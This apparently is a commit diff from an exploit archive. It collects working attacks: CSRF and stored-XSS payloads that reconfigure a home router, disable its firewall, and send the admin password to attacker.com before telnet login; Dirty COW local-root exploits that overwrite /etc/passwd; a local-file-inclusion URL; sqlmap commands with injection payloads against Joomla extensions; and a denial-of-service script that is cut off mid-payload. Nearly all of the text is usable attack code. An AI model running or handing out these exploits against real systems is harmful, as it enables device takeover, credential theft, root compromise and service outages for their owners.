<input type="hidden" name='add' value='true'>
<input type="hidden" name='name' value='<img src=x onerror=alert(1)>'>
<input type="hidden" name='protocol' value='TCP/UDP'>
<input type="hidden" name='ip' value='10.0.0.82'>
<input type="hidden" name='ipv6addr' value='x'>
<input type="hidden" name='startport' value='123'>
<input type="hidden" name='endport' value='123'>
</form>
<script>document.x.submit();</script>
13) DELETE A PORT FORWARDING SERVICE
http://10.0.0.1/actionHandler/ajax_port_forwarding.php?del=5
14) EDIT EXISTING PORT FORWARDING SERVICES
<form name="x" action="http://10.0.0.1/actionHandler/ajax_port_forwarding.php" method="post">
<input type="hidden" name='edit' value='true'>
<input type="hidden" name='name' value=huhuhuh???New Name then …’>
<input type="hidden" name='protocol' value='TCP/UDP'>
<input type="hidden" name='ip' value='10.0.0.82'>
<input type="hidden" name='ipv6addr' value='x'>
<input type="hidden" name='startport' value='123'>
<input type="hidden" name='endport' value='123'>
<input type="hidden" name='ID' value='4'>
</form>
<script>document.x.submit();</script>
15) ENABLE/DISABLE PORT FORWARDING
<form name="x" action="http://10.0.0.1/actionHandler/ajax_port_forwarding.php" method="post">
<input type="hidden" name='set' value='true'>
<input type="hidden" name='UFWDStatus' value='Enabled'>
</form>
<script>document.x.submit();</script>
Ill ignore port triggering cuz idc about port triggering . . .
16) CHANGE REMOTE MANAGEMENT SERVICE
<form name="x" action="http://10.0.0.1/actionHandler/ajax_remote_management.php" method="post">
<input type="hidden" name='http' value='true'>
<input type="hidden" name='httport' value='notset'>
<input type="hidden" name='https' value='true'>
<input type="hidden" name='httpsport' value='notset'>
<input type="hidden" name='allowtype' value='notset'>
<input type="hidden" name='startIP' value='notset'>
<input type="hidden" name='endIP' value='notset'>
<input type="hidden" name='telnet' value='notset'>
<input type="hidden" name='ssh' value='notset'>
<input type="hidden" name='startIPv6' value='notset'>
<input type="hidden" name='endIPv6' value='notset'>
</form>
<script>document.x.submit();</script>
17) CHANGE FIREWALL SETTINGS
<form name="x" action="http://10.0.0.1/actionHandler/ajaxSet_firewall_config.php" method="post">
<input type="hidden" name='configInfo' value='{"firewallLevel": "Low", "block_http": "Disabled", "block_icmp": "Disabled", "block_multicast": "Disabled", "block_peer": "Disabled", "block_ident": "Disabled", "disableFwForTrueStaticIP": "undefined"} '>
</form>
<script>document.x.submit();</script>
18) CHANGE PASSWORD PoC
UPLOAD test1.js TO yourjavascript.com (OR USE THE ONE I ALREADY UPLOADED : http://yourjavascript.com/1663477161/test1.js )
CONTENTS ARE:
document.cookie="PHPSESSID=1";k=document.cookie;f=k.replace("PHPSESSID=1","");d=f.replace("auth=","");s=d.replace(";","");g=s.replace("%3D","");t=atob(g);console.log(t);l=t.replace("admin:","");console.log(l);var xhttp=new XMLHttpRequest();xhttp.open("POST","/actionHandler/ajaxSet_password_config.php",true);xhttp.send('configInfo={"newPassword": “testpassword123”, "oldPassword”: “’+ l+’”});
SHORTEN URL ON GOOGLE (OR USE THE ONE I ALREADY SHORTENED : http://goo.gl/FQHkQj)
CREATE HTML FILE :
<form name="x" action="http://10.0.0.1/actionHandler/ajax_managed_devices.php" method="post">
<input type="hidden" name='add' value='true'>
<input type="hidden" name='type' value='Block'>
<input type="hidden" name='name' value='<script src="http://goo.gl/FQHkQj">'>
<input type="hidden" name='mac' value='xx:xx:xx:xx:xx:x8'>
<input type="hidden" name='block' value='true'>
</form>
<script>document.x.submit();</script>
I PUT ON SRC IN THE SCRIPT TAG MY SHORTENED URL
19) GET PASSWORD PoC
UPLOAD test1.js TO yourjavascript.com
CONTENTS ARE:
document.cookie="PHPSESSID=1";k=document.cookie;f=k.replace("PHPSESSID=1","");d=f.replace("auth=","");s=d.replace(";","");g=s.replace("%3D","");t=atob(g);console.log(t);l=t.replace("admin:","");console.log(l);var xhttp=new XMLHttpRequest();xhttp.open("POST","http://attacker.com/get_password.php",true);xhttp.send('configInfo={"newPassword": “testpassword123”, "oldPassword”: “’+ l+’”});
SHORTEN URL ON GOOGLE
CREATE HTML FILE :
<form name="x" action="http://10.0.0.1/actionHandler/ajax_managed_devices.php" method="post">
<input type="hidden" name='add' value='true'>
<input type="hidden" name='type' value='Block'>
<input type="hidden" name='name' value='<script src="shortened url">'>
<input type="hidden" name='mac' value='xx:xx:xx:xx:xx:x8'>
<input type="hidden" name='block' value='true'>
</form>
<script>document.x.submit();</script>
I PUT ON SRC IN THE SCRIPT TAG MY SHORTENED URL
20) ACCESS DEVICES IN THE NETWORK
<form name="x" action="http://10.0.0.1/actionHandler/ajax_port_forwarding.php" method="post">
<input type="hidden" name='add' value='true'>
<input type="hidden" name='name' value='something'>
<input type="hidden" name='protocol' value='TCP/UDP'>
<input type="hidden" name='ip' value='Target Internal IP'>
<input type="hidden" name='ipv6addr' value='x'>
<input type="hidden" name='startport' value='Target Port'>
<input type="hidden" name='endport' value='Target Port'>
</form>
<script>document.x.submit();</script>
21) CREATE A NEW PRIVATE WI-FI NETWORK WITH THE PASSWORD OF YOUR CHOICE:
<form name="x" action="http://10.0.0.1/actionHandler/ajaxSet_wireless_network_configuration_edit.php" method="post">
<input type="hidden" name='configInfo' value='{"radio_enable":"true", "network_name":"MY-OWN-PRIVATE-PERSONAL-NETWORK", "wireless_mode":"g,n", "security":"WPAWPA2_PSK_TKIPAES", "channel_automatic":"true", "channel_number":"5", "network_password”:”password”, "broadcastSSID":"true", "enableWMM":"true", "ssid_number”:”3”}>
</form>
<script>document.x.submit();</script>
22) RCE
HTML FILE:
<form name="x" action="http://10.0.0.1/actionHandler/ajax_remote_management.php" method="post">
<input type="hidden" name='http' value='true'>
<input type="hidden" name='httport' value='notset'>
<input type="hidden" name='https' value='true'>
<input type="hidden" name='httpsport' value='notset'>
<input type="hidden" name='allowtype' value='notset'>
<input type="hidden" name='startIP' value='notset'>
<input type="hidden" name='endIP' value='notset'>
<input type="hidden" name='telnet' value='true'>
<input type="hidden" name='ssh' value='true'>
<input type="hidden" name='startIPv6' value='notset'>
<input type="hidden" name='endIPv6' value='notset'>
</form>
<!--Do part 19)-->
<form name="h" action="http://10.0.0.1/actionHandler/ajax_managed_devices.php" method="post">
<input type="hidden" name='add' value='true'>
<input type="hidden" name='type' value='Block'>
<input type="hidden" name='name' value='<script src="shortened url">'>
<input type="hidden" name='mac' value='xx:xx:xx:xx:xx:x8'>
<input type="hidden" name='block' value='true'>
</form>
<form name="f" action="http://10.0.0.1/actionHandler/ajaxSet_firewall_config.php" method="post">
<input type="hidden" name='configInfo' value='{"firewallLevel": "Low", "block_http": "Disabled", "block_icmp": "Disabled", "block_multicast": "Disabled", "block_peer": "Disabled", "block_ident": "Disabled", "disableFwForTrueStaticIP": "undefined"} '>
</form>
<script>document.x.submit();document.h.submit();document.f.submit();</script>
THEN TELNET TO THE IP ADDRESS THAT SENT THE REQUEST TO ATTACKER.COM/GET_PASSWORD.PHP AND USE THE USERNAME 'admin' AND THE PASSWORD YOU GOT IN ATTACKER.COM/GET_PASSWORD.PHP
THE AUTHOR TAKES NO RESPONSIBILITY FOR DAMAGE DONE WITH THIS EXPLOIT.
FOR PUBLISHING OR SENDING OR COPYING THIS EXPLOIT THE AUTHOR MUST BE GIVEN FULL CREDIT FOR THE EXPLOIT.
IF THE VULNERABILITY IS REPORTED TO VENDOR AND VENDOR RESPONDS AND FIXES IT THEN FULL CREDIT MUST BE GIVEN TO THE AUTHOR.

3
platforms/linux/local/40616.c
View file

@ -1,4 +1,7 @@
/*
*
* EDB-Note: After getting a shell, doing "echo 0 > /proc/sys/vm/dirty_writeback_centisecs" may make the system more stable.
*
* (un)comment correct payload first (x86 or x64)!
*
* $ gcc cowroot.c -o cowroot -pthread

39
platforms/linux/local/40839.c
View file

@ -1,29 +1,34 @@
// EDB-Note: After getting a shell, doing "echo 0 > /proc/sys/vm/dirty_writeback_centisecs" may make the system more stable.
//
// This exploit uses the pokemon exploit as a base and automatically
// generates a new passwd line. The original /etc/passwd is then
// backed up to /tmp/passwd.bak and overwritten with the new line.
// This exploit uses the pokemon exploit of the dirtycow vulnerability
// as a base and automatically generates a new passwd line.
// The user will be prompted for the new password when the binary is run.
// The original /etc/passwd file is then backed up to /tmp/passwd.bak
// and overwrites the root account with the generated line.
// After running the exploit you should be able to login with the newly
// created user.
//
// Original exploit:
// https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c
// To use this exploit modify the user values according to your needs.
// The default is "firefart".
//
// To use this exploit modify the user values according to your needs
// Original exploit (dirtycow's ptrace_pokedata "pokemon" method):
// https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c
//
// Compile with
// Compile with:
// gcc -pthread dirty.c -o dirty -lcrypt
//
// gcc -pthread dirty.c -o dirty -lcrypt
// Then run the newly create binary by either doing:
// "./dirty" or "./dirty my-new-password"
//
// and just run the newly create binary with ./dirty
// Afterwards, you can either "su firefart" or "ssh firefart@..."
//
// DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT !
// DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT!
// mv /tmp/passwd.bak /etc/passwd
//
// Exploit adopted by Christian "FireFart" Mehlmauer
// https://firefart.at
//
#include <fcntl.h>
#include <pthread.h>
#include <string.h>
@ -131,7 +136,15 @@ int main(int argc, char *argv[])
user.home_dir = "/root";
user.shell = "/bin/bash";
char *plaintext_pw = getpass("Please enter new password: ");
char *plaintext_pw;
if (argc >= 2) {
plaintext_pw = argv[1];
printf("Please enter the new password: %s\n", plaintext_pw);
} else {
plaintext_pw = getpass("Please enter the new password: ");
}
user.hash = generate_password_hash(plaintext_pw);
char *complete_passwd_line = generate_passwd_line(user);
printf("Complete line:\n%s\n", complete_passwd_line);
@ -178,4 +191,4 @@ int main(int argc, char *argv[])
printf("\nDON'T FORGET TO RESTORE %s FROM %s !!!\n\n",
filename, backup_filename);
return 0;
}
}

261
platforms/linux/local/40847.cpp Executable file
View file

@ -0,0 +1,261 @@
// EDB-Note: Compile: g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
// EDB-Note: Recommended way to run: ./dcow -s (Will automatically do "echo 0 > /proc/sys/vm/dirty_writeback_centisecs")
//
// -----------------------------------------------------------------
// Copyright (C) 2016 Gabriele Bonacini
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation; either version 3 of the License, or
// (at your option) any later version.
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
// You should have received a copy of the GNU General Public License
// along with this program; if not, write to the Free Software Foundation,
// Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
// -----------------------------------------------------------------
#include <iostream>
#include <fstream>
#include <string>
#include <thread>
#include <sys/mman.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/types.h>
#include <pwd.h>
#include <pty.h>
#include <string.h>
#include <termios.h>
#include <sys/wait.h>
#include <signal.h>
#define BUFFSIZE 1024
#define PWDFILE "/etc/passwd"
#define BAKFILE "./.ssh_bak"
#define TMPBAKFILE "/tmp/.ssh_bak"
#define PSM "/proc/self/mem"
#define ROOTID "root:"
#define SSHDID "sshd:"
#define MAXITER 300
#define DEFPWD "$6$P7xBAooQEZX/ham$9L7U0KJoihNgQakyfOQokDgQWLSTFZGB9LUU7T0W2kH1rtJXTzt9mG4qOoz9Njt.tIklLtLosiaeCBsZm8hND/"
#define TXTPWD "dirtyCowFun\n"
#define DISABLEWB "echo 0 > /proc/sys/vm/dirty_writeback_centisecs\n"
#define EXITCMD "exit\n"
#define CPCMD "cp "
#define RMCMD "rm "
using namespace std;
class Dcow{
private:
bool run, rawMode, opShell, restPwd;
void *map;
int fd, iter, master, wstat;
string buffer, etcPwd, etcPwdBak,
root, user, pwd, sshd;
thread *writerThr, *madviseThr, *checkerThr;
ifstream *extPwd;
ofstream *extPwdBak;
struct passwd *userId;
pid_t child;
char buffv[BUFFSIZE];
fd_set rfds;
struct termios termOld, termNew;
ssize_t ign;
void exitOnError(string msg);
public:
Dcow(bool opSh, bool rstPwd);
~Dcow(void);
int expl(void);
};
Dcow::Dcow(bool opSh, bool rstPwd) : run(true), rawMode(false), opShell(opSh), restPwd(rstPwd),
iter(0), wstat(0), root(ROOTID), pwd(DEFPWD), sshd(SSHDID), writerThr(nullptr),
madviseThr(nullptr), checkerThr(nullptr), extPwd(nullptr), extPwdBak(nullptr),
child(0){
userId = getpwuid(getuid());
user.append(userId->pw_name).append(":");
extPwd = new ifstream(PWDFILE);
while (getline(*extPwd, buffer)){
buffer.append("\n");
etcPwdBak.append(buffer);
if(buffer.find(root) == 0){
etcPwd.insert(0, root).insert(root.size(), pwd);
etcPwd.insert(etcPwd.begin() + root.size() + pwd.size(),
buffer.begin() + buffer.find(":", root.size()), buffer.end());
}else if(buffer.find(user) == 0 || buffer.find(sshd) == 0 ){
etcPwd.insert(0, buffer);
}else{
etcPwd.append(buffer);
}
}
extPwdBak = new ofstream(restPwd ? TMPBAKFILE : BAKFILE);
extPwdBak->write(etcPwdBak.c_str(), etcPwdBak.size());
extPwdBak->close();
fd = open(PWDFILE,O_RDONLY);
map = mmap(nullptr, etcPwdBak.size(), PROT_READ,MAP_PRIVATE, fd, 0);
}
Dcow::~Dcow(void){
extPwd->close();
close(fd);
delete extPwd; delete extPwdBak; delete madviseThr; delete writerThr; delete checkerThr;
if(rawMode) tcsetattr(STDIN_FILENO, TCSANOW, &termOld);
if(child != 0) wait(&wstat);
}
void Dcow::exitOnError(string msg){
cerr << msg << endl;
// if(child != 0) kill(child, SIGKILL);
throw new exception();
}
int Dcow::expl(void){
madviseThr = new thread([&](){ while(run){ madvise(map, etcPwdBak.size(), MADV_DONTNEED);} });
writerThr = new thread([&](){ int fpsm = open(PSM,O_RDWR);
while(run){ lseek(fpsm, reinterpret_cast<off_t>(map), SEEK_SET);
ign = write(fpsm, etcPwd.c_str(), etcPwdBak.size()); }
});
checkerThr = new thread([&](){ while(iter <= MAXITER){
extPwd->clear(); extPwd->seekg(0, ios::beg);
buffer.assign(istreambuf_iterator<char>(*extPwd),
istreambuf_iterator<char>());
if(buffer.find(pwd) != string::npos &&
buffer.size() >= etcPwdBak.size()){
run = false; break;
}
iter ++; usleep(300000);
}
run = false;
});
cerr << "Running ..." << endl;
madviseThr->join();
writerThr->join();
checkerThr->join();
if(iter <= MAXITER){
child = forkpty(&master, nullptr, nullptr, nullptr);
if(child == -1) exitOnError("Error forking pty.");
if(child == 0){
execlp("su", "su", "-", nullptr);
exitOnError("Error on exec.");
}
if(opShell) cerr << "Password overridden to: " << TXTPWD << endl;
memset(buffv, 0, BUFFSIZE);
ssize_t bytes_read = read(master, buffv, BUFFSIZE - 1);
if(bytes_read <= 0) exitOnError("Error reading su prompt.");
cerr << "Received su prompt (" << buffv << ")" << endl;
if(write(master, TXTPWD, strlen(TXTPWD)) <= 0)
exitOnError("Error writing pwd on tty.");
if(write(master, DISABLEWB, strlen(DISABLEWB)) <= 0)
exitOnError("Error writing cmd on tty.");
if(!opShell){
if(write(master, EXITCMD, strlen(EXITCMD)) <= 0)
exitOnError("Error writing exit cmd on tty.");
}else{
if(restPwd){
string restoreCmd = string(CPCMD).append(TMPBAKFILE).append(" ").append(PWDFILE).append("\n");
if(write(master, restoreCmd.c_str(), restoreCmd.size()) <= 0)
exitOnError("Error writing restore cmd on tty.");
restoreCmd = string(RMCMD).append(TMPBAKFILE).append("\n");
if(write(master, restoreCmd.c_str(), restoreCmd.size()) <= 0)
exitOnError("Error writing restore cmd (rm) on tty.");
}
if(tcgetattr(STDIN_FILENO, &termOld) == -1 )
exitOnError("Error getting terminal attributes.");
termNew = termOld;
termNew.c_lflag &= static_cast<unsigned long>(~(ICANON | ECHO));
if(tcsetattr(STDIN_FILENO, TCSANOW, &termNew) == -1)
exitOnError("Error setting terminal in non-canonical mode.");
rawMode = true;
while(true){
FD_ZERO(&rfds);
FD_SET(master, &rfds);
FD_SET(STDIN_FILENO, &rfds);
if(select(master + 1, &rfds, nullptr, nullptr, nullptr) < 0 )
exitOnError("Error on select tty.");
if(FD_ISSET(master, &rfds)) {
memset(buffv, 0, BUFFSIZE);
bytes_read = read(master, buffv, BUFFSIZE - 1);
if(bytes_read <= 0) break;
if(write(STDOUT_FILENO, buffv, bytes_read) != bytes_read)
exitOnError("Error writing on stdout.");
}
if(FD_ISSET(STDIN_FILENO, &rfds)) {
memset(buffv, 0, BUFFSIZE);
bytes_read = read(STDIN_FILENO, buffv, BUFFSIZE - 1);
if(bytes_read <= 0) exitOnError("Error reading from stdin.");
if(write(master, buffv, bytes_read) != bytes_read) break;
}
}
}
}
return [](int ret, bool shell){
string msg = shell ? "Exit.\n" : string("Root password is: ") + TXTPWD + "Enjoy! :-)\n";
if(ret <= MAXITER){cerr << msg; return 0;}
else{cerr << "Exploit failed.\n"; return 1;}
}(iter, opShell);
}
void printInfo(char* cmd){
cerr << cmd << " [-s] [-n] | [-h]\n" << endl;
cerr << " -s open directly a shell, if the exploit is successful;" << endl;
cerr << " -n combined with -s, doesn't restore the passwd file." << endl;
cerr << " -h print this synopsis;" << endl;
cerr << "\n If no param is specified, the program modifies the passwd file and exits." << endl;
cerr << " A copy of the passwd file will be create in the current directory as .ssh_bak" << endl;
cerr << " (unprivileged user), if no parameter or -n is specified.\n" << endl;
exit(1);
}
int main(int argc, char** argv){
const char flags[] = "shn";
int c;
bool opShell = false,
restPwd = true;
opterr = 0;
while ((c = getopt(argc, argv, flags)) != -1){
switch (c){
case 's':
opShell = true;
break;
case 'n':
restPwd = false;
break;
case 'h':
printInfo(argv[0]);
break;
default:
cerr << "Invalid parameter." << endl << endl;
printInfo(argv[0]);
}
}
if(!restPwd && !opShell){
cerr << "Invalid parameter: -n requires -s" << endl << endl;
printInfo(argv[0]);
}
Dcow dcow(opShell, restPwd);
return dcow.expl();
}

12
platforms/php/webapps/31796.txt
View file

@ -1,12 +0,0 @@
source: http://www.securityfocus.com/bid/29227/info
Internet Photoshow is prone to a vulnerability that can result in unauthorized database access.
Attackers can exploit this issue to gain administrative access to the application.
Internet Photoshow Special Edition is vulnerable; other editions may also be affected.
The following example code is available:
javascript:document.cookie = "login_admin=true; path=/";

30
platforms/php/webapps/40850.txt Executable file
View file

@ -0,0 +1,30 @@
# Exploit Title: WP Vault 0.8.6.6 Plugin WordPress Local File Inclusion
# Date: 28/11/2016
# Exploit Author: Lenon Leite
# Vendor Homepage: https://wordpress.org/plugins/wp-vault/
# Software Link: https://wordpress.org/plugins/wp-vault/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
# Category: webapps
# Version: 0.8.6.6
# Tested on: Ubuntu 14.04
1 - Description:
$_GET[“wpv-image”] is not escaped in include file.
http://lenonleite.com.br/en/blog/2016/11/30/wp-vault-0-8-6-6-local-file-inclusion/
2 - Proof of Concept:
http://Target/?wpv-image=[LFI]
http://Target/?wpv-image=../../../../../../../../../../etc/passwd
3 - Timeline:
12/11/2016 - Discovered
12/11/2016 - vendor not found

70
platforms/php/webapps/40851.txt Executable file
View file

@ -0,0 +1,70 @@
Title: Unauthenticated SQL Injection in Huge-IT Catalog v1.0.7 for Joomla
Author: Larry W. Cashdollar, @_larry0
Date: 2016-09-16
Download Site: http://huge-it.com/joomla-catalog/
Vendor: huge-it.com
Vendor Notified: 2016-09-17
Vendor Contact: info@huge-it.com
Description:
Huge-IT Product Catalog is made for demonstration, sale, advertisements for your products. Imagine a stand with a
variety of catalogs with a specific product category. To imagine is not difficult, to use is even easier.
Vulnerability:
The following code does not prevent an unauthenticated user from injecting SQL into functions via 'load_more_elements_into_catalog' located in ajax_url.php.
Vulnerable Code in : ajax_url.php
11 define('_JEXEC', 1);
12 defined('_JEXEC') or die('Restircted access');
.
.
.
308 } elseif ($_POST["post"] == "load_more_elements_into_catalog") {
309 $catalog_id = $_POST["catalog_id"];
310 $old_count = $_POST["old_count"];
311 $count_into_page = $_POST["count_into_page"];
312 $show_thumbs = $_POST["show_thumbs"];
313 $show_description = $_POST["show_description"];
314 $show_linkbutton = $_POST["show_linkbutton"];
315 $parmalink = $_POST["parmalink"];
316 $level = $_POST['level'];
.
.
.
359 $query->select('*');
360 $query->from('#__huge_it_catalog_products');
361 $query->where('catalog_id =' . $catalog_id);
362 $query->order('ordering asc');
363 $db->setQuery($query, $from, $count_into_page);
CVE-ID: CVE-2016-1000125
Export: JSON TEXT XML
Exploit Code:
• $ sqlmap -u 'http://example.com/components/com_catalog/ajax_url.php' --data="prod_page=1&post=load_more_elements_into_catalog&catalog_id=*&old_count=*&count_into_page=*&show_thumbs=*&show_description=*&parmalink=*" --level=5 --risk=3
• Parameter: #1* ((custom) POST)
• Type: error-based
• Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
• Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=-2369 OR 1 GROUP BY CONCAT(0x717a627871,(SELECT (CASE WHEN (1973=1973) THEN 1 ELSE 0 END)),0x716b787671,FLOOR(RAND(0)*2)) HAVING MIN(0)#&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink=
• Type: AND/OR time-based blind
• Title: MySQL >= 5.0.12 time-based blind - Parameter replace
• Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=(CASE WHEN (7371=7371) THEN SLEEP(5) ELSE 7371 END)&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink=
• Type: UNION query
• Title: Generic UNION query (random number) - 15 columns
• Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=-5943 UNION ALL SELECT 2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,CONCAT(0x717a627871,0x494a475477424c724f6f7853556d61597544576f4b614d6e41596771595253476c4251797a685974,0x716b787671)-- FvOy&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink=
• ---
• [16:48:10] [INFO] the back-end DBMS is MySQL
• web server operating system: Linux Debian 8.0 (jessie)
• web application technology: Apache 2.4.10
• back-end DBMS: MySQL >= 5.0.12
• [16:48:10] [WARNING] HTTP error codes detected during run:
• 500 (Internal Server Error) - 6637 times
• [16:48:10] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'
• [*] shutting down at 16:48:10
Advisory: http://www.vapidlabs.com/advisory.php?v=171

59
platforms/php/webapps/40852.txt Executable file
View file

@ -0,0 +1,59 @@
Title: Unauthenticated SQL Injection in Huge-IT Portfolio Gallery Joomla extension v1.0.6
Author: Larry W. Cashdollar, @_larry0
Date: 2016-09-16
Download Site: http://huge-it.com/joomla-portfolio-gallery/
Vendor: huge-it.com
Vendor Notified: 2016-09-17
Vendor Contact: info@huge-it.com
Description: Huge-IT Portfolio Gallery extension can do wonders with your website. If you wish to show your photos, videos, enclosing the additional images and videos, then this Portfolio Gallery extension is what you need.
Vulnerability:
The following lines allow unauthenticated users to perform SQL injection against the functions in ajax_url.php:
In file ajax_url.php:
11 define('_JEXEC',1);
12 defined('_JEXEC') or die('Restircted access');
.
.
.
49 $page = $_POST["page"];
50 $num=$_POST['perpage'];
51 $start = $page * $num - $num;
52 $idofgallery=$_POST['galleryid'];
53 $level = $_POST['level'];
54 $query = $db->getQuery(true);
55 $query->select('*');
56 $query->from('#__huge_itportfolio_images');
57 $query->where('portfolio_id ='.$idofgallery);
58 $query ->order('#__huge_itportfolio_images.ordering asc');
59 $db->setQuery($query,$start,$num);
CVE-ID: CVE-2016-1000124
Export: JSON TEXT XML
Exploit Code:
• $ sqlmap -u 'http://example.com/components/com_portfoliogallery/ajax_url.php' --data="page=1&galleryid=*&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2" --level=5 --risk=3
• (custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
• sqlmap identified the following injection point(s) with a total of 2870 HTTP(s) requests:
• ---
• Parameter: #1* ((custom) POST)
• Type: error-based
• Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
• Payload: page=1&galleryid=-2264 OR 1 GROUP BY CONCAT(0x71716a7a71,(SELECT (CASE WHEN (3883=3883) THEN 1 ELSE 0 END)),0x7178627071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2
• Type: AND/OR time-based blind
• Title: MySQL >= 5.0.12 time-based blind - Parameter replace
• Payload: page=1&galleryid=(CASE WHEN (9445=9445) THEN SLEEP(5) ELSE 9445 END)&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2
• ---
• [13:30:39] [INFO] the back-end DBMS is MySQL
• web server operating system: Linux Debian 8.0 (jessie)
• web application technology: Apache 2.4.10
• back-end DBMS: MySQL >= 5.0.12
• [13:30:39] [WARNING] HTTP error codes detected during run:
• 500 (Internal Server Error) - 2715 times
• [13:30:39] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/192.168.0.4'
• [*] shutting down at 13:30:39
Screen Shots:
Advisory: http://www.vapidlabs.com/advisory.php?v=170

101
platforms/windows/dos/40849.py Executable file
View file

@ -0,0 +1,101 @@
#!/usr/bin/env python
#
#
# X5 Webserver 5.0 Remote Denial Of Service Exploit
#
#
# Vendor: iMatrix
# Product web page: http://www.xitami.com
# Affected version: 5.0a0
#
# Summary: X5 is the latest generation web server from iMatix Corporation.
# The Xitami product line stretches back to 1996. X5 is built using iMatix's
# current Base2 technology for multithreading applications. On multicore machines,
# it is much more scalable than Xitami/2.
#
# Desc: The vulnerability is caused due to a NULL pointer dereference when processing
# malicious HEAD and GET requests. This can be exploited to cause denial of service
# scenario.
#
# ----------------------------------------------------------------------------
#
# (12c0.164c): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# *** WARNING: Unable to verify checksum for C:\zslab\ws\64327\xitami-5.0a0-windows\xitami.exe
# *** ERROR: Module load completed but symbols could not be loaded for C:\zslab\ws\64327\xitami-5.0a0-windows\xitami.exe
# eax=0070904d ebx=03a91808 ecx=0070904d edx=00000000 esi=0478fef4 edi=0478fe8c
# eip=00503ae0 esp=0478fb28 ebp=0478fb48 iopl=0 nv up ei pl zr na pe nc
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
# xitami+0x103ae0:
# 00503ae0 8b02 mov eax,dword ptr [edx] ds:002b:00000000=????????
# 0:004> kb
# # ChildEBP RetAddr Args to Child
# WARNING: Stack unwind information not available. Following frames may be wrong.
# 00 0478fb48 00460ee6 0ace0840 04025ea0 0478fd78 xitami+0x103ae0
# 01 0478fe8c 0045f6fa 0ace0bd8 0478ff28 cccccccc xitami+0x60ee6
# 02 0478fee8 004c60a1 0478ff14 00000000 0478ff38 xitami+0x5f6fa
# 03 0478ff28 004fdca3 03a90858 03a67e38 00000000 xitami+0xc60a1
# 04 0478ff40 00510293 03a90858 fc134d7d 00000000 xitami+0xfdca3
# 05 0478ff7c 00510234 00000000 0478ff94 7679338a xitami+0x110293
# 06 0478ff88 7679338a 03a91808 0478ffd4 77029902 xitami+0x110234
# 07 0478ff94 77029902 03a91808 7134bcc2 00000000 kernel32!BaseThreadInitThunk+0xe
# 08 0478ffd4 770298d5 00510190 03a91808 00000000 ntdll!__RtlUserThreadStart+0x70
# 09 0478ffec 00000000 00510190 03a91808 00000000 ntdll!_RtlUserThreadStart+0x1b
#
# ----------------------------------------------------------------------------
#
# Tested on: Microsoft Windows XP Professional SP3 (EN)
# Microsoft Windows 7 Ultimate SP1 (EN)
#
#
# Vulnerability discovered by Stefan Petrushevski aka sm - <stefan@zeroscience.mk>
#
#
# Advisory ID: ZSL-2016-5377
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5377.php
#
#
# 15.11.2016
#
import sys, socket
if len(sys.argv) < 3:
print '------- X5 Webserver 5.0a0 - Remote Denial of Service ------\n'
print '\nUsage: ' + sys.argv[0] + ' <target> <port>\n'
print 'Example: ' + sys.argv[0] + ' 8.8.8.8 80\n'
print '------------------------------------------------------------\n'
sys.exit(0)
host = sys.argv[1]
port = int(sys.argv[2])
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((host, port))
s.settimeout(666)
payload = (
'\x47\x45\x54\x20\x2f\x50\x52\x4e\x20\x48\x54\x54\x50\x2f\x31\x2e\x31\x0d\x0a'
'\x48\x6f\x73\x74\x3a\x20\x31\x37\x32\x2e\x31\x39\x2e\x30\x2e\x32\x31\x35\x0d'
'\x0a\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x5a\x53\x4c\x2d\x46\x75'
'\x7a\x7a\x65\x72\x2d\x41\x67\x65\x6e\x74\x2f\x34\x2e\x30\x2e\x32\x38\x35\x20'
'\x0d\x0a\x41\x63\x63\x65\x70\x74\x3a\x20\x74\x65\x78\x74\x2f\x78\x6d\x6c\x2c'
'\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x6d\x6c\x2c\x61\x70\x70'
'\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x68\x74\x6d\x6c\x2b\x78\x6d\x6c\x2c'
'\x74\x65\x78\x74\x2f\x68\x74\x6d\x6c\x3b\x71\x3d\x30\x2e\x39\x2c\x74\x65\x78'
'\x74\x2f\x70\x6c\x61\x69\x6e\x3b\x71\x3d\x30\x2e\x38\x2c\x69\x6d\x61\x67\x65'
'\x2f\x70\x6e\x67\x2c\x2a\x2f\x2a\x3b\x71\x3d\x30\x2e\x35\x0d\x0a\x41\x63\x63'
'\x65\x70\x74\x2d\x4c\x61\x6e\x67\x75\x61\x67\x65\x3a\x20\x65\x6e\x2d\x75\x73'
